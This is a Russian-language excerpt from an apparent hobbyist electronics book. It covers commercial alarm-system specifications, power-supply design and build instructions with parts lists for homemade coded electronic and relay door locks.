И еще необходимо отметить, что в названной и других противоугонных системах указывается: сторожевое устройство управляется автоматически по программе специальным ключом с встроенной в него микросхемой и должно обеспечивать: блокировку двигателя по трем шлейфам, автоматическое включение, выключение кодовым ключом, динамическое изменение кода в пределах до миллиарда комбинаций, невозможность сканирования, блокировку стартера и топливного насоса, использование сторожевого устройства с любыми типами сигнальных устройств.

Очевидно, что такая информация для специалистов и радиолюбителей не представляет какой-либо интерес даже для предварительной оценки, если нет сведений о составе функциональных узлов и блоков, их монтажных и принципиальных схем.

Некоторые сторожевые устройства промышленного производства, а также выпускаемые отдельными фирмами заслуживают нашего внимания, потому что имеют повышенные технические характеристики и улучшенные электрические параметры, но и они не свободны от указанных выше недостатков.

Например, универсальная тревожная система «Микрон» позволяет осуществлять радиоохрану магазинов, офисов, квартир, гаражей и т. д. на расстоянии до 1,5 км от ЦПУ в зависимости от условий расположения охраняемых объектов.

Основные электрические параметры и технические характеристики универсальной тревожной системы

Номинальная рабочая частота радиоканала, кГц ... 26 960 Чувствительность принимающего устройства, мкВ,

не менее............................ 10

Номинальное напряжение питающей сети

переменного тока, В.................... 220

Таблица 3.1, Время работы автономных источников питания постоянного тока типа PS20

3-11.jpg

Окончание табл. 3. 1

3-12.jpg

Номинальное напряжение автономного источника

питания постоянного тока, В............... 12

Номинальнаяя частота питающей сети переменного тока, Гц ..................... 50

Пределы изменения напряжении питающей сети

переменного тока, при которых сохраняется

работоспособнось системы, В .............. 198...240

Пределы изменения напряжения питающей сети

постоянною тока, В..................... 10... 14

Количество номеров абонентов, шт............ 1000

Мощносгь, потребляемая системой в период работы

при полной нагрузке, Вт.................. 500

Пределы изменения выходной мощности

сигнала тревоги, Bт ................... 1,2...2

Задержка подачи сигнала после cpaбатывания

системы, с ........................... 60...100

Количество охраняемых шлейфов, шт .......... .2

Продолжительность работы передатчика

после срабатывания системы, с ............. 10

Номинальный ток при полной нагрузке, А ....... 0,6

Номинальная емкость резервных источников

питания, А-ч .......................... 1,5

Вероятность безотказной работы системы

при риске заказчика в=0, 95, не менее........ 0, 93

Количество кодированных сигналов, шт......... 10 000

кпд, %, не менее........................ 90

Универсальная система сторожевой сигнализации «Роса» предназначена для установки как на стационарных, гак и на подвижных объектах. Эта система характеризуется значительным радиусом действия, мгновенной передачей информации или сигнала тревоги на ЦПУ, возможностью передачи информации на персональный приемник, возможностью охраны нескольких объектов одновременно, наличием резервного электропитания, электронным доступом к охраняемым объектам, возможностью контроля за состоянием охраняемого объекта, возможностью программирования сигналов контроля.

Рассматриваемая система включает в свой состав пульт централизованного наблюдения, абонентские комплекты для автомобилей, стационарных объектов и групповых объектов охраны. В свою очередь, в состав этих изделий входят персональный компьютер, БП, приемное устройство, антенный усилитель, антенна, программное обеспечение, электронные ключи, персональный приемник с зарядным устройством, блок передатчика с антенной, концентратор с системой доступа к электронным блокам.

Основные электрические параметры и технические характеристики электронного сторожевого устройства «Роса»

Диапазон рабочих частот, МГц, в пределах которых

устанавливается одна частота для конкретного

объекта охраны .................. 140...210

Чувствительность приемника у абонента, мкВ,

не более ...................... 0,5

Избирательность, дБ ................ 65. .70

Излучение гетеродина в антенне, нВт, не более .... 2

Мощность несущей частоты излучателя,Вт ...... . 4...6

Девиация частоты, кГц .................... 10,8...15,6

Номинальное напряжение питающей сети

переменного тока, В ................... 220

Номинальная частота питающей сети

переменного тока, Гц .................... 50

Номинальное напряжение автономного источника

питания постоянного тока, В ............... 12

Пределы изменения напряжения питающей сети

переменного тока, В ..................... 187...242

Пределы изменения частоты питающей сети

неременного тока, Гц ................... . 49,5...50,5

Пределы изменения напряжения автономного

источника питания постоянного тока, В ........ 10,8...15

Напряжение питания персонального переносного

приемника, В ........................ . 6,6...8,5

Непрерывное время работы персонального приемника

без подзарядки аккумулятора, ч ............. 12

Время работы резервного источника питания

при нормальной температуре, ч ............. 4

Общее число шлейфов, шт .................. 8

Время передачи тревожной сигнализации, с ...... 10

Время передачи одной радиопосылки, мс ........ 16

Срок службы устройства, ч, не менее .......... 5000

Вероятность безотказной работы системы при риске

заказчика в=0,9, не менее ............... .0,92

Ток, потребляемый устройством в ждущем режиме

работы, А, не более .................... .0,07

Сопротивление изоляции токоведущих частей

отдельных блоков системы относительно

металлического корпуса, МОм, не менее ....... 10

Помехозащищенность системы при воздействии

внешнего электромагнитного поля, дБ ......... 120

кпд, %, не менее ........................ 75

Условия эксплуатации:

температура окружающей среды, С ........ —10...+40

относительная влажность воздуха

при температуре 25 °С, % ............. . 90±3

Климатическое исполнение .................. УХЛ

Сторожевая автономная система «Оса» (изготавливается в Санкт-Петербурге фирмой «Аквасвязь») устанавливается для охраны квартир, офисов, сейфов, различных средств передвижения: автомобилей, яхт и др. Работает сторожевое устройство как в автономном, так и в режиме выдачи сообщений на ЦПУ.

Основные электрические параметры и технические характеристики сторожевой автономной системы «Оса»

Номинальное напряжение питающий сети

переменного тока в стационарном режиме

работы, В ......................... 220

Номинальная частота питающей сети

неременного тока, Гц ................... 50

Номинальное напряжение автономною источника

электропитания постоянного тока, В ......... 12

Пределы изменения напряжения питающей сети

неременного тока, В .................... 187...242

Пределы изменения частоты питающейсети

переменного тока, Гц ................... 49,5...50,5

Пределы изменения напряжения автономного

источника питания постоянного тока, В ....... 10...15

Коэффициент нелинейных искажений питающей сети

переменного тока, %, не более ............. 12

Количество одновременно охраняемых объектов

при работе в автономном режиме, шт ........ 1

Количество охраняемых точек на одном объекте, шт . . 1...5 Сопротивление шлейфа, кОм, при нормальных

климатических условиях работы ............ 0,6...2,4

Время задержки срабатывания сторожевого

устройства, с, не менее .................. 15

Максимальный ток, потребляемый от сети

переменного тока в режиме передачи сигнала. А,

не более ............................ 2

Период подтверждения работоспособности

устройства, мин, не более ................ 1

Источник резервного электропитания устройства —

аккумулятор ......................... бСГ-1,6

Мощность, потребляемая системой от сети в режиме

вызова и передачи сигнала, Вт ............. 100

Ток, потребляемый внешней сиреной, мА ........ 350

Суммарный ток, потребляемый при полной

нагрузке. А, не более ................... 1

Время непрерывного звучания сирены, мин, не менее . 3 Срок службы, ч, не менее .................. 1000

Срок гарантии, мес ...................... 12

Вероятность безотказной работы устройства

при риске заказчика в= 0,9, не менее ........ 0,95

Сопротивление изоляции токоведущих частей

устройства, МОм, не менее ............... 15

кпд, %,не менее ....................... 80

Условия эксплуатации:

температура окружающей среды, °С ........ —10...+40

относительная влажность воздуха

при температуре 25 °С, % ............. 90±3

Электропитание электронных сторожевых устройств осуществляется, как правило, стабилизированном напряжением постоянного тока, которое вырабатывается вторичными БП или ХИТ. При этом к напряжению электропитания предъявляются достаточно жесткие технические требования. В каждом отдельном случае необходимо обеспечить оптимальные параметры выходного и входного напряжений, максимального тока нагрузки, коэффициентов;

стабилизации и пульсации, внутреннего сопротивления и некоторых других характеристик. Точный инженерный расчет таких стабилизаторов достаточно сложен и не всегда может быть квалифицированно выполнен домашним мастером. Поэтому в электронных схемах сторожевых ус тройств всегда предлагаются готовые решения, которых могут быть улучшены методом упрощенного анализа. Это касается в первую очередь выбора стабилизаторов на ОУ с различными выходными характеристиками.

Выходное напряжение, используемое для электропитания сторожевых устройств, укладывается в следующий ряд: 2; 3; 5; 6; 3; 9; 12,6; 15 В постоянного стабилизированного тока, отдельные значения которого могут плавно изменяться в строго определенных пределах. Ток нагрузки условно разделен на три группы с максимальными значениями до 0,025 А; до 0,8 А; до 2 А, при высоких значениях коэффициента стабилизации.

При монтаже простейших СИП применяются в общем случае такие элементы, как РЭ, управляющее устройство, выпрямительное устройство с ДН и фильтры.

Схемы ДН представлены на рис. 3.1.

В данных схемах элементами образцового напряжения служат стабилитроны VD5 и VD6. Для получения необходимых выходных параметров стабилизаторы питаются от двухполупериодного выпрямителя. В качестве емкостных фильтров применяются электролитические конденсаторы С1 и С2 любых типов, которые могут быть включены параллельно друг другу. В стабилизаторах напряжения используются три основные схемы включения РЭ (рис 3.2).

Порядок упрощенного построения СИП предусматривает следующую последовательность:

1. По номинальному току нагрузки, пользуясь схемой. приведенной на рис. 3.2, выбирается РЭ.

2. По заданному выходному напряжению стабилизатора выбирается схема усилительного элемента и схема

3-13.jpg

Рис. 3. 1. Схема делителя напряжения:

а — с двумя выходными напряжениями разной полярности, б - с одним выходным напряжением постоянного тока.

3-14.jpg

Рис. 3. 2. Схема включения регулирующего элемента:

а — на одном транзисторе; б — на трех транзисторах с дополнительным питанием; в — на одном составном транзисторе из трех транзисторов.

3-15.jpg

Рис. 3. 3. Схемы питания операционных усилителей, применяемых в стабилизаторах напряжения.

питания ОУ (рис. 3.3), если этот ОУ применяется в стабилизаторе напряжения.

3. Далее выбирается схема ДН (рис. 3.1) и на оснонании этих данных составляется полная электрическая схема СИП.

4. По данным, приведенным в табл.3.23.4, определяются номинальные значения основных параметров ЭРЭ схемы источника питания.

Таблица 3.2. Основные электрические параметры

вторичного источника электропитания, необходимые для выбора

элементов схемы

3-16.jpg

Таблица 3.3. Основные электрические параметры регулирующего элемента стабилизатора напряжения

3-17.jpg

Таблица 3. 4. Основные электрические параметры резисторов и конденсаторов, работающих в стабилизаторе напряжения

3-18.jpg

Примечание: сопротивления резисторов даны в Ом или кОм, которые обозначены буквой «к». Емкости конденсаторов даны в мкф.

На заключительном этапе упрощенного построения СИП выполняется работа по сборке и монтажу этого устройства. Но перед включением схемы в сеть переменного тока и, самое главное, перед подключением микросхемы типа СН необходимо убедиться, что входное напряжение на ней удовлетворяет требованию:

Uвх min<=Uвх<=Uвхmax.

Рис. 3.1. Схема делителя напряжения:

Изображение: 

Рис. 3.2. Схема включения регулирующего элемента:

Изображение: 

Рис. 3.3. Схемы питания операционных усилителей, применяемых в стабилизаторах напряжения.

Изображение: 

Таблица 3. 4. Основные электрические параметры резисторов и конденсаторов, работающих в стабилизаторе напряжения

Изображение: 

Таблица 3.1, Время работы автономных источников питания постоянного тока типа PS20 (окончание)

Изображение: 

Таблица 3.1, Время работы автономных источников питания постоянного тока типа PS20

Изображение: 

Таблица 3.2. Основные электрические параметры вторичного источника электропитания, необходимые для выбора элементов схемы

Изображение: 

Таблица 3.3. Основные электрические параметры регулирующего элемента стабилизатора напряжения

Изображение: 

3. 10. Быстроперестраиваемое сторожевое устройство

3. 10. БЫСТРОПЕРЕСТРАИВАЕМОЕ СТОРОЖЕВОЕ УСТРОЙСТВО

Это несложное электронное устройство от ранее рассмотренных отличается как кодированием, так и съемно-логическим решением. Цифровой блок построен на ИМС, которые обладают высокой экономичностью, что позволяет питать его и от автономного источника, и от сети переменного тока. Электронное сторожевое устройство широкого применения выполнено по принципу кодирования информации простым переключением контактов, которое осуществляется в любое время по желанию хозяина собственности. Поэтому данное изделие относится к числу электронных устройств автоматического действия с многотысячными вариантами шифрования. Рассматриваемый в составе сторожевой системы БЭ предназначен для установки на входных бронированных дверях жилых, производственных и хозяйственных помещений от вторжения посторонних лиц и злоумышленников, не знакомых с установленным в данный момент шифром.

Простота шифрования устройства и запоминания кода и достаточная ясность работы электронного быстроперестраиваемого сторожевого устройства позволяют использовать его для охраны гаражей, складских помещений и хозяйственных построек на приусадебных и садово-огородных участках. Многочисленные варианты кодирования не позволяют открыть устройство простым перебором (для открывания замка таким способом потребовалось бы несколько месяцев непрерывной работы). Механическая часть замка здесь не рассматривается.

Устойчивая и надежная работа сторожевого устройства обеспечивается от сети переменного тока напряжением 220 В, реже 127 В частотой 50 Гц или от аккумуляторной батареи с номинальным выходным напряжением постоянного тока 12 В. Подключается аккумуляторная батарея к малогабаритным приборным зажимным контактам Х2 и ХЗ, соблюдая полярность.

Принципиальная электрическая схема рассматриваемого сторожевого устройства, собранного на трех ИМС типа К176, приведена на рис. 3. 16. Как следует из схемы, в состав устройства входят устройство подключения к источникам электропитания, сетевой понижающий трансформатор питания Т1, два выпрямительных устройства, емкостный фильтр, стабилизатор напряжения, выполненный на биполярных транзисторах, кодирующее устройство, электронный блок счетно-решающего устройства и ИМ.

Входное устройство включает в свой состав электрический соединитель X1 типа «вилка», смонтированный с электрическим кабелем и обеспечивающий подключение сторожевого устройства к сети переменного тока; плавкие предохранители F1 и F2, защищающие входные цепи устройства от перегрузок и коротких замыканий, которые могут произойти из-за неправильной сборки и ошибок в монтаже схемы, а также из-за неисправных комплектующих ЭРЭ; индикаторную лампочку H1, сигнализирующую о готовности сторожевого устройства к работе; конденсаторы С1 и С2, обеспечивающие защиту от низкочастотных электромагнитных помех, которые проникают в сеть питания; два малогабаритных зажимных контакта Х2 и ХЗ, рассчитанных на подключение одного соединения.

Сетевой понижающий трансформатор питания Т1 самодельной конструкции изготавливается на броневом ленточном магнитопроводе типа ШЛ с одной катушкой, которая устанавливается на центральном стержне. Площадь активного поперечного сечения стали магнитопровода должна быть не менее 6 см2. Моточные данные сетевого трансформатора Т1 приведены в табл. 3.15. Первичная обмотка трансформатора имеет отвод от 1270-го витка для подключения к сети переменного тока напряжением 127 В. На выходе обмоток трансформатора действует переменное напряжение 6,3 В и 13 В. При изготовлении трансформатора необходимо обеспечить повышенную прочность электроизоляции между слоями обмоточного провода и между обмотками различными изоляционными материалами: лакотканью, изоляционны-

Таблица 3. 15. Моточные данные сетевого понижающего

трансформатора питания Т1, примененного

в быстро перестраиваемом сторожевом устройстве

3-101.jpg

ми лаками, конденсаторной бумагой и др. Намотка провода на катушку — рядовая, однослойная. Сетевой трансформатор обеспечивает расчетные значения выходных и выпрямленных напряжений постоянного тока, гальваническую развязку вторичных цепей сторожевого устройства от сети переменного тока высокого напряжения и необходимую электробезопасность при эксплуатации.

Первый выпрямитель предназначен для создания постоянного напряжения 13 В, обеспечивающего работу электронной части принципиальной схемы сторожевого устройства. Выпрямитель создан на двух выпрямительных диодах VD1, VD2, собранных по двухполупериодной схеме со средним выводом вторичной обмотки трансформатора. Выпрямитель по этой схеме характеризуется повышенной частотой пульсации выпрямленного напряжения, возможностью использования выпрямительных диодов с общим катодом (или анодом), что значительно упрощает их установку на общем радиаторе охлаждения, а также повышенным обратным напряжением на комплекте выпрямительных диодов и более сложной конструкцией сетевого трансформатора. Выпрямитель работа

ет на емкостный фильтр, собранный на конденсаторах СЗ—С5. Оксидныи электролитический конденсатор С5 имеет большую емкость.

С выпрямителя постоянное напряжение поступает на стабилизатор напряжения, собранный по компенсационной схеме и создающий высокий уровень стабилизации напряжения на нагрузке. Стабилизатор напряжения относится к нерегулируемым устройствам и имеет в своем составе устройство сравнения, РЭ, УПТ и устройство защиты от перегрузок и коротких замыканий в электронной схеме сторожевого устройства. В качестве РЭ в стабилизаторе применен транзистор VT4. Опорное напряжение снимается со стабилитрона VD9. Устройство защиты собрано на стабилитроне VD8, транзисторе VT1 и резисторах R3 и R4. Между базой и эмиттером транзистора VT1 действует разность напряжений. Величина этой разницы зависит от протекающего через резистор R4 тока нагрузки. В номинальном режиме работы через резистор R4 протекает ток нагрузки, и на нем падает очень небольшое напряжение, которое подается на базу транзистора VT1, а напряжение на эмиттере этого транзистора стабилизировано стабилитроном VD8, включенным в прямом направлении.

Быстроперестраиваемое сторожевое устройство состоит собственно из электромеханического замка, работающего от ИМ (электромагнита, соленоида, электромагнитного реле и др.), и управляющей электронной схемы, которая обеспечивает автоматическую подачу сигнала на открывание замка. Кодирование памяти электронной схемы осуществляется замыканием контактов девяти переключателей S6—S14 в соответствующие положения. Эти переключатели, как следует из схемы, имеют всего два положения: «выключено» и «включено». Положение «включено» соответствует сигналу «да» или высокому уровню логической единицы, а положение «выключено» — сигналу «нет» или низкому уровню логического нуля.

Работа сторожевого устройства, включающего в себя счетно-решающий электронный узел, основана на использовании принципа подсчета девятиразрядной кодовой комбинации цифр, которая, в свою очередь, представляет собой произвольное чередование логических уравнений «да» и «нет» (логическая единица или логический нуль). Девятиразрядный шифр вырабатывается

ИМС DA3, на выходе которой установлены импульсные диоды VD11-VD19 и однополюсные переключатели S6- S14. Набор шифра осуществляется двумя переключателями S4 и S5, которые имею переключающие группы контактов, не фиксируемых в нажатом положении. Команда на срабатывание ИМ в открывание дверей охраняемого объекта происходит только при правильном наборе шифра.

Собранный в составе БП узел защиты электронной схемы работает следующим образом. При коротком замыкании и перегрузках в выходных цепях, когда ток нагрузки превышает допустимый, падение напряжения на резисторе R4 открывает транзистор VT1, выключает стабилитрон VD9, и ток через регулирующий транзистор VT4 резко ограничивается. В результате этого нагрузка обесточивается и выключается. Защита электронного узла по данной схеме срабатывает при токе, не превышающем 0,5А, и может регулироваться изменением сопротивления резистора R4.

Выпрямленное и стабилизированное напряжение постоянного тока поступает на узел кодирования и дешифрования, собранный на трех ИМС DA1—DA3. При этом ИМС DA3 выполняет функцию счетчика-дешифратора. Декодирующее устройство содержит два двухполюсных переключателя S4 и S5, при помощи которых последовательно осуществляется дешифрование счетного узла. ИМС DA1 представляет собой RS-триггер, который срабатывает от первого замыкания контактов одного из переключателей S4, S5 и не реагирует на последующие ошибочные включения. ИМС DA2 представляет собой устройство, запрещающее дальнейший счет импульсов вводимого кода после первой ошибки в наборе. В том случае, когда набираемый шифр не совпал с установленным в любом разряде счетчика, на выходе второго триггера ИМС DA2 появляется высокий уровень логической единицы, который запрещает дальнейший счет. Но внешне это никак не проявляется. Последующие нажатия на любые кнопки переключателей S4 и S5 уже не изменяют состояние счетчика до тех пор, пока сторожевое устройство не будет возвращено в исходное положение. И каждое последующее нажатие на кнопки постоянно увеличивает время нахождения ИМС DA3 в состоянии, предшествующем ошибке в наборе шифра. После прекращения нажатий на кнопки

переключателей S4 или S5 по истечении временной задержки на выходе инвертора ИМС DA1 появляется высокий уровень логической единицы, переключающий триггер ИМС DA2 и счетчик ИМС DA3 в состояние низкого уровня логического нуля.

Необходимо также заметить, что в сторожевом устройстве предусмотрен узел задержки времени срабатывания, состоящий из электрической цепочки DA1, VD20, С5, R19, R20. При ошибке в наборе шифра это устройство позволяет повторить попытку только после определенно заданного интервала времени. Если начать повторный набор шифра до истечения времени этого интервала, то срабатывания сторожевого устройства и открывания механического замка не последует даже при правильном наборе. Это важное свойство сторожевого устройства может знать только хозяин.

В схему сторожевого устройства включен оптрон DU1, обеспечивающий передачу сигнала на срабатывание ИМ, полную гальваническую развязку между источником питания ИМ и электронной частью сторожевого устройства, а также дополнительную электробезопасность эксплуатации изделия в целом.

Работу сторожевого устройства контролируют с помощью индикаторной лампы H1 и светодиода VD10. При включении устройства в сеть переменного тока загорается индикаторная лампа H1, а при срабатывании механической части замка после правильного набора шифра — светодиод VD10 красного или зеленого цвета.

На принципиальной электрической схеме сторожевого устройства показано положение электронной схемы при всех отключенных контактах переключателей S6—S14, которое соответствует низкому уровню логического нуля, то есть набора нет. При правильном наборе шифра сигнал высокого уровня логической единицы с выхода ИМС DA3 (вывод 11) открывает ключевой транзистор VT2, что приводит к срабатыванию оптрона DU1, а вслед за ним — тиристора VD7, включающего электропитание исполнительного электромагнита или соленоида, и механический замок открывается.

Если за период временной задержки дверь охраняемого объекта не будет открыта, сторожевое устройство возвращается в исходное состояние, соответствующее нулевому состоянию второго триггера ИМС DA2 и счетчика-дешифратора ИМС DA3.

В быстропереcтраиваемом сторожевом устройстве применены следующие покупные и самодельные комплектующие ЭРИ и ЭРЭ: сетевой понижающий трансформатор питания Т1 типа ШЛ броневой конструкции; ИМС DA1 типа К176ЛА7, DA2 — К176ТМ2, DA3 К176ИЕ8; транзисторы VT1 типа МП42, VT2 — КТ315Г, VT3 — МП42, VT4 — П213; выпрямительные диоды VD1 типа Д226Д, VD2 Д226Д, VD3 VD6 - КД202Р, VD11-VD19 — КД522А, VD20 — КД522А, VD21 - КД105Б;

стабилитроны VD8 типа Д814Д, VD9 — Д814Д; тиристор VD7 типа КУ202Н; светодиод VD10 типа АЛ307А; оптрон DU1 типа АОУ103Б; ИМ К1 (электромагнит, соленоид или электромагнитное реле); индикаторная лампа Н1 типа МН-6,3-0,22 А; плавкие предохранители F1, F2 типа ПМ1-0.5 A, F3 — ПMl-0,25 A;

переключатели S1 типа П2Т-1-1, S2, S3 — П1Т-1-1, S4, S5 — МПЗ-1, S6—S14 — МТ1-2; конденсаторы С1 типа К40У-9-630В-0,033 мкФ, С2 — К40У-9-630В-0,033 мкФ, С5 — К50-6-25В-500 мкФ, С4 — К10-7В-50В-2200 пф, СЗ — К10-7В-50В-2200 пФ, С6 — К50-6-25В-500 мкФ, С7 — ЭТО-20В-1.5 мкФ; резисторы R1 типа ВСа-0,5-2,2 кОм, R2 — ВСа-1-2,4 кОм, R3 — ВСа-1-620 Ом, R4 — проволочный самодельный, намотан на резисторе ВСа-2-2 Ом нихромовым проводом диаметром 0,1 мм, R5 — ВСа-0,5-750 Ом, R6 — ВСа-0,25-470 Ом, R7 — СПЗ-1б-0,5Вт-2,2 к0м, R8 — ВСа-0,5-1,2 кОм, R9 — ВСа-0,25-10 кОм, R10 — ВСа-0,25-470 Ом, R11 — ВСа-0,5-4,3 к0м, R12 — ВСа-0,25-2,4 к0м, R13 — ВСа-2-10 к0м, R14 — ВСа-0,25-1 к0м, R15 — ВСа-0,125-100 к0м, R16 — ВСа-0,25-82 к0м, R17 — ВСа-0,125-27 к0м, R18 — ВСа-0,5-27 к0м, R19 — ВСа-0,125-27 к0м, R20 — ВСа-0,125-4,7 к0м, электрические соединители X1 типа «вилка» с электрическим кабелем длиной не менее 1,5 м, Х2, ХЗ — КМЗ-1.

При регулировке и ремонте электронной части сторожевого устройства некоторые ЭРИ и ЭРЭ могут быть заменены другими аналогичными элементами, не ухудшающими основные электрические параметры и эксплуатационные характеристики сторожевого устройства. Например, сетевой понижающий трансформатор питания Т1 можно заменить на унифицированный трансформатор типа ТПП, ТН, ТС или ТТ; конденсаторы типа К50-6 — на К50-3, К50-12, К50-16, К50-20; резисторы типа ВСа — на МЛТ, ОМЛТ, ВС, МТ, УЛИ, C1-4, C2-8; диоды типа Д226Д — на Д237А, Д237Е, КД202В, диоды типа Д202Р — на Д234Б, Д248Б, КД206В, диоды типа КД522А — на КД509А, КД510А, КД513А. Рекомендации по замене транзисторов рассмотрены выше, в первой главе.

Необходимо заметить, что выбор нового шифра осуществляется переключением контактов выключателей

S6—S14 в течение нескольких секунд, поэтому данное устройство относится к числу быстроперестраиваемых.

Изготавливается сторожевое устройство в виде двух самостоятельных блоков: БП и БЭ. Блок питания имеет максимальные размеры 130Х110Х80 мм, выполнен в виде прямоугольника с лицевой панелью, верхней и нижней крышками, в которых предусматриваются вентиляционные отверстия, расположенные в местах установки тепловыделяющих элементов. На лицевой панели БП устанавливаются индикаторная лампочка Н1,держатели предохранителей F1 и F2, клеммы Х2 и ХЗ, на которых действует постоянное стабилизированное напряжение 9 В, и ручки управления переключателями S2 и S3.

Блок электроники изготавливается в пластмассовом корпусе с размерами 140Х35Х50 мм. На верхней крышке корпуса располагаются: индикаторная лампочка (светодиод), ручки управления переключателей S6—S14, приборные малогабаритные зажимные контакты А и Б, контакты для подключения электропитания ИМ Х4 и Х5 к сети переменного тока и контакты Х6 и Х7 для подключения исполнительного устройства, которое устанавливается непосредственно на входной двери охраняемого объекта. Все комплектующие элементы БЭ монтируются на печатной плате из одностороннего фольгированного стеклотекстолита толщиной 1...1,5 мм.

При изготовлении лицевых панелей БП и БЭ сторожевого устройства необходимо вырезать много прямоугольных и круглых отверстий разного размера, которые выполняются по предварительной разметке, сделанной на миллиметровой бумаге и заранее наклеенной на лицевую панель.

Необходимо еще раз обратить внимание на правильность установки и пайки микросхем серии К176. При этом меры предосторожности не сводятся только к тому, чтобы защитить корпус микросхемы от недопустимых деформаций. Конструкция должна обеспечивать эффективный отвод тепла за счет конвекции воздуха или с помощью теплоотводящих элементов. Должно быть обеспечено высокое качество паяных соединений. И не менее важным обстоятельством при работе с микросхемами этой серии является необходимость соблюдения специальных мер защиты от повреждений статическим электричеством. Жало паяльника заземляется, на руку надевается заземляющий браслет в виде манжеты, а электропитание паяльника должно осуществляться только через понижающий сетевой трансформатор, обеспечивающий полную гальваническую развязку.Часто в распоряжении радиолюбителя имеются микросхемы, подходящие по функциональному назначению, но нет технической возможности для такой замены. В этом случае можно изготовить плату-переходник из фольгированного стеклотекстолита. Новую схему монтируют на этой плате, которую соединяют с печатной платой. При хранении ИМС, некоторых типов транзисторов (особенно полевого типа) выводы таких ЭРЭ закорачивают между собой, как правило, медным проводником или алюминиевой фольгой.

Примененные в устройстве микросхемы относятся к структурам КМОП, и поэтому вышеприведенная рекомендация для снятия статического электричества является особенно важной. При создании устройств с микросхемами, примененными в сторожевом устройстве, типы конденсаторов и значения их емкостей выбираются из расчета: емкость электролитического конденсатора на одну микросхему должна быть не менее 0,03 мкФ.

Создание электронных сторожевых устройств на ИМС со структурой КМОП сопряжено с необходимостью учитывать технологию их изготовления. Известно, что эти микросхемы подвержены губительному влиянию статического электричества. Опасное значение электрического потенциала составляет примерно +100 В постоянного тока. Пайку выводов этих микросхем следует начинать с выводов питания, но затем последовательность пайки может быть любой.

Дополнительно следует заметить, что микросхемы по технологическим приемам изготовления подразделяются на определенные типы, основными из которых являются микросхемы ТТЛ — транзисторно-транзисторной логики;

ТТЛШ — ТТЛ с диодами Шоттки; КМОП — микросхемы комплементарной структуры типа металл — окисел — полупроводник.

Основные электрические параметры и технические характеристики быстроперестраиваемого сторожевого устройства

Номинальное напряжение питающей сети

переменного тока, В .................. .220 или 127

Номинальная частота питающей сети

переменного тока, Гц ................ .50

Номинальное напряжение автономного источника

электропитания постоянного тока, В ........9

Коэффициент нелинейных искажении питающей сети

переменною тока, %, не более ............. 12

Пределы изменения напряжения питающей сети

переменного тока, В .................... 180.... .250 или 110... .140

Пределы изменения частоты питающей сети

переменного тока, Гц .................... 49,5... 50,5

Пределы изменения напряжения автономного

источника электропитания сторожевого устройства

постоянного тока, В ..................... 8.... 14

Напряжение на вторичной обмотке сетевого

трансформатора Т1 при номинальном напряжении

питающей сети 220 В, В .................. 26 (выводы 4 и 6)

Напряжения на выводах вторичных обмоток

трансформатора Т1 при изменении напряжения

питающей сети oт 180 до 250В, В:

4 и 5 ............................. 10,6...14,7

5 и 6 . ............................ 10,6...14,7

7 и 8 . ............................ 5,1... 7,1

Коэффициент стабилизации выпрямленного напряжения, не менее ................... 500

Амплитуда пульсации выпрямленного напряжения постоянного тока на выходе выпрямителя, мВ, не более ............................ 10

Номинальный ток питания ИМ замка. А, не более . . 0,5 Ток срабатывания защитного устройства в БП при коротком замыкании, А .......... 0,3

Мощность, потребляемая сторожевым устройством в ждущем режиме работы, мВт, не более . . . . . . 20

Время срабатывания сторожевого устройства

после правильного набора шифра, мс, не более . . 40

Мощность сетевого трансформатора, Вт . . . . . . . . 60

Время задержки в наборе шифра при ошибке, с . . . 3-20

Вероятность безотказной работы устройства

при риске заказчика в=0,9, не менее ......... 0,89

Срок службы устройства, ч, не менее .......... 7000

Помехозащищенность сторожевого устройства от ложных срабатываний при воздействии внешнего электромагнитного поля в полисе частот от 0,15 до 30 МГц, не менее . . . . . . . . . . . . . . . 60

Сопротивление изоляции токоведущих частей и проводников устройства между собой и металлическим корпусом, МОм, не менее . . . . . 5

кпд, %, не менее . . . . . . . . . . . . . . . . . . . . . . . . 85

Условия эксплуатации:

температура окружающей среды, °С . . . . . . . . —25...+-45

относительная влажность воздуха

при температуре окружающей среды 22 С, %, не более ......................... 90+-3

атмосферное давление воздуха, мм рт. ст...... 200... 900

 

t81.jpg

Рис. 3.16. Принципиальная схема быстроперестраиваемого сторожевого устройства.

Рис. 3.16. Принципиальная схема быстроперестраиваемого сторожевого устройства.

Изображение: 

Таблица 3.15. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в быстро перестраиваемом сторожевом у

Изображение: 

3. 11. Сторожевое устройство на электромагнитных реле

3.11. СТОРОЖЕВОЕ УСТРОЙСТВО НА ЭЛЕКТРОМАГНИТНЫХ PEЛE

Рассматриваемое устройство относится к группе релейных автоматов, предназначенных для управления электромеханическими замками, которые устанавливаются на дверях жилых и производственных здании. Особенностью данного устройства является то, что оно очень просто в изготовлении, не нуждается в сложной и длительной настройке, не имеет в своем составе ППП и элементов электроники, работает непосредственно от сети переменного тока напряжением 220 В частотой 50 Гц. Последнее обстоятельство предъявляет особые условия к монтажу и электропроводке сторожевого устройства, главными из которых являются требования по технике электробезопасности и пожаробезопасности.

Схемно-конструктивное решение этого устройства позволяет устанавливать его только в тех помещениях и на объектах, где имеется возможность подключения к сети переменного тока, поэтому область применения устройства несколько ограничена, а его релейный блок требует постоянного осмотра и наблюдения за его состоянием. Не менее важной особенностью релейного автомата является то, что он позволяет очень быстро устанавливать любой код, без каких-либо перепаек и монтажа перемычек, так как не содержит разъемных соединений и приборных контактов. Весь монтаж осуществляется электрическим кабелем с двойной изоляцией, сопротивление постоянному току которого должно быть не менее 50 МОм. Монтажные соединения между контактами релейного блока должны производиться только многожильным проводом пайкой, например припоем ПОС-60.

Принципиальная электрическая схема сторожевого устройства на электромагнитных реле без применения ППП приведена на рис. 3.17. Устройство состоит из релейного блока, включающего семь электромагнитных реле типа МКУ-48, кодирующего узла и дешифратора.

Основным блоком устройства является блок электромагнитных реле, который изготавливается в металлическом или пластмассовом корпусе. На верхней крышке этого блока собирается узел кодирования, выполненный из семи перекидных переключателей с фиксированным положением контактных пар. Релейный блок и узел кодирования представляют собой единую сборочную конструкцию, которая устанавливается на стене охраняемого помещения и вдали от входной двери, так как соединяется с сетью питания и блоком управления двумя двужильными проводами. На боковых поверхностях релейного блока необходимо предусмотреть вентиляционные отверстия, не снижающие механической прочности конструкции.

В качестве кодирующих переключателей S3—S9 рекомендуется использовать двухполюсные переключатели типа МТ1, П1Т-1-1.

